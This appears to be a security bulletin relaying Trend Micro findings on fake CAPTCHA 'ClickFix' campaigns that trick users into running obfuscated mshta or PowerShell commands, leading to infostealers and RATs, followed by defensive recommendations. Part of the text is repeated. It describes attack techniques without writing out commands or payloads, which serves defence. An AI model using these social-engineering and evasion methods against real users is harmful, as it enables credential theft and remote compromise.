Fake CAPTCHA Attacks Deploy Infostealers and RATs in a Multistage Payload Chain
Summary:
Trend Micro has witnessed a significant wave of sophisticated fake CAPTCHA cases while conducting their MDR investigations in the last couple of months. These attacks leverage various initial access methods, including phishing emails with embedded malicious links or PDFs, malvertising, along with SEO poisoning, to redirect users to deceptive CAPTCHA pages. A key characteristic of these campaigns is the ClickFix-style “verification steps” used to trick the victim into downloading malware. Potential victims are instructed to copy and paste a malicious command into the Windows Run dialog. This command then executes highly obfuscated scripts, often utilizing Microsoft HTML Application Host (mshta) or base64-encoded PowerShell, to perform in-memory execution of multistage encoded scripts to bypass traditional file-based detection. A unique aspect of these attacks is the unique delivery technique observed: the hosting of specially crafted .mp3 files on attacker-controlled sites, which contain injected and heavily obfuscated JavaScript. Executing the JavaScript leads to a multistage process culminating in the download and execution of various malware families, including Lumma Stealer, Emmental, Rhadamanthys, AsyncRAT, and XWorm. These campaigns abuse multiple legitimate platforms, including file-sharing services, content and search platforms, music repositories, URL redirectors, and document hosts. These attacks culminate in severe impacts, including data exfiltration, credential theft, remote access, and the establishment of persistent backdoor loaders. Organizations with Windows-based environments and lenient script execution policies are particularly vulnerable.
Security Officer Comments:
The surge in fake CAPTCHA attacks employing increasingly novel techniques, such as the embedding of malicious JavaScript within .mp3 files, highlights the evolving sophistication of ClickFix campaigns. The attackers' reliance on social engineering tactics, leveraging urgency and exploiting trust in familiar legitimate platforms and legitimate domains, underscores the critical need for enhanced user awareness training. The abuse of built-in Windows utilities like mshta and PowerShell for in-memory execution demonstrates a clear attempt to evade traditional file-based detection mechanisms. The observed deployment of a diverse range of malware, from multiple different information stealers to remote access trojans, indicates a multifaceted attacker objective, likely encompassing both financial gain and long-term persistence. The use of SEO poisoning for compromised legitimate websites further emphasizes the need for EDR security and proactive threat hunting. Organizations must implement layered security defenses, including disabling unnecessary features like the Run dialog, and following the Principle of Least Privilege (PoLP), to mitigate the risk posed by these evolving and evasive campaigns. The potential future exploitation of other file formats and delivery methods, such as shifting focus to experiment with users on social media or messaging apps to deliver disguised or shortened malicious links, necessitates an adaptive security posture.
Suggested Corrections:
IOCs are available here.
Trend Micro’s Recommendations for Defending Against These Attacks:
https://www.trendmicro.com/en_us/research/25/e/unmasking-fake-captcha-cases.html
Trend Micro has witnessed a significant wave of sophisticated fake CAPTCHA cases while conducting their MDR investigations in the last couple of months. These attacks leverage various initial access methods, including phishing emails with embedded malicious links or PDFs, malvertising, along with SEO poisoning, to redirect users to deceptive CAPTCHA pages. A key characteristic of these campaigns is the ClickFix-style “verification steps” used to trick the victim into downloading malware. Potential victims are instructed to copy and paste a malicious command into the Windows Run dialog. This command then executes highly obfuscated scripts, often utilizing Microsoft HTML Application Host (mshta) or base64-encoded PowerShell, to perform in-memory execution of multistage encoded scripts to bypass traditional file-based detection. A unique aspect of these attacks is the unique delivery technique observed: the hosting of specially crafted .mp3 files on attacker-controlled sites, which contain injected and heavily obfuscated JavaScript. Executing the JavaScript leads to a multistage process culminating in the download and execution of various malware families, including Lumma Stealer, Emmental, Rhadamanthys, AsyncRAT, and XWorm. These campaigns abuse multiple legitimate platforms, including file-sharing services, content and search platforms, music repositories, URL redirectors, and document hosts. These attacks culminate in severe impacts, including data exfiltration, credential theft, remote access, and the establishment of persistent backdoor loaders. Organizations with Windows-based environments and lenient script execution policies are particularly vulnerable.
Security Officer Comments:
The surge in fake CAPTCHA attacks employing increasingly novel techniques, such as the embedding of malicious JavaScript within .mp3 files, highlights the evolving sophistication of ClickFix campaigns. The attackers' reliance on social engineering tactics, leveraging urgency and exploiting trust in familiar legitimate platforms and legitimate domains, underscores the critical need for enhanced user awareness training. The abuse of built-in Windows utilities like mshta and PowerShell for in-memory execution demonstrates a clear attempt to evade traditional file-based detection mechanisms. The observed deployment of a diverse range of malware, from multiple different information stealers to remote access trojans, indicates a multifaceted attacker objective, likely encompassing both financial gain and long-term persistence. The use of SEO poisoning for compromised legitimate websites further emphasizes the need for EDR security and proactive threat hunting. Organizations must implement layered security defenses, including disabling unnecessary features like the Run dialog, and following the Principle of Least Privilege (PoLP), to mitigate the risk posed by these evolving and evasive campaigns. The potential future exploitation of other file formats and delivery methods, such as shifting focus to experiment with users on social media or messaging apps to deliver disguised or shortened malicious links, necessitates an adaptive security posture.
Suggested Corrections:
IOCs are available here.
Trend Micro’s Recommendations for Defending Against These Attacks:
- Disable access to the Run dialog (Win + R). This is advisable in environments where restricting user access to administrative tools and script execution is a priority. This reduces the risk of executing malicious PowerShell or MSHTA commands and limits the misuse of native Windows utilities.
- Apply the principle of least privilege. Apart from restricting the Run dialog, ensure that users are granted only the permissions required for their tasks. This includes restricting write or execute access to sensitive directories, disabling script execution where not needed, and preventing elevation to admin privileges without approval workflows. Reducing privilege levels limits the ability of users (and malware) to execute system-altering commands.
- Restrict access to unapproved tools and file-sharing platforms. Maintain a baseline of approved software and block access to public file-sharing services if not required for business use. Controlling access helps reduce the risk of unauthorized downloads and limits the attacker’s ability to deliver or load additional components.
- Monitor for unusual clipboard and process behavior. As these attacks demonstrated, users can be socially engineered into pasting and executing malicious commands from the clipboard. Monitoring abnormal clipboard activity, such as encoded commands or suspicious script fragments, can provide early warning signs. It’s also important to track process behavior, particularly in environments where users interact with web content, PDFs, or messaging apps. Watch for abuse patterns, such as media players or browsers spawning unexpected executables or script interpreters, which could indicate payload delivery.
- Harden browser configurations. Configure browsers to reduce exposure to SEO poisoning, malvertising, and script-based threats. This includes restricting JavaScript execution on untrusted or unknown domains, enabling filters to block malicious ad networks, disabling autoplay and mixed content to reduce risk from embedded scripts, and removing unnecessary browser plugins or extensions, especially those with elevated permissions or outdated components.
- Enable memory protection features. There are built-in OS-level controls in Windows environments that can be enabled to detect in-memory execution, reflective DLL injection, and other evasive techniques. These protections help defend against multistage, fileless payloads that bypass traditional file-based detection.
- Invest in user education. Training users to recognize suspicious links or phishing emails significantly reduces the risk of compromise. Awareness around safe browsing — even on production networks — is critical, as threats like the fake CAPTCHA attacks exploit user trust and social engineering tactics.
https://www.trendmicro.com/en_us/research/25/e/unmasking-fake-captcha-cases.html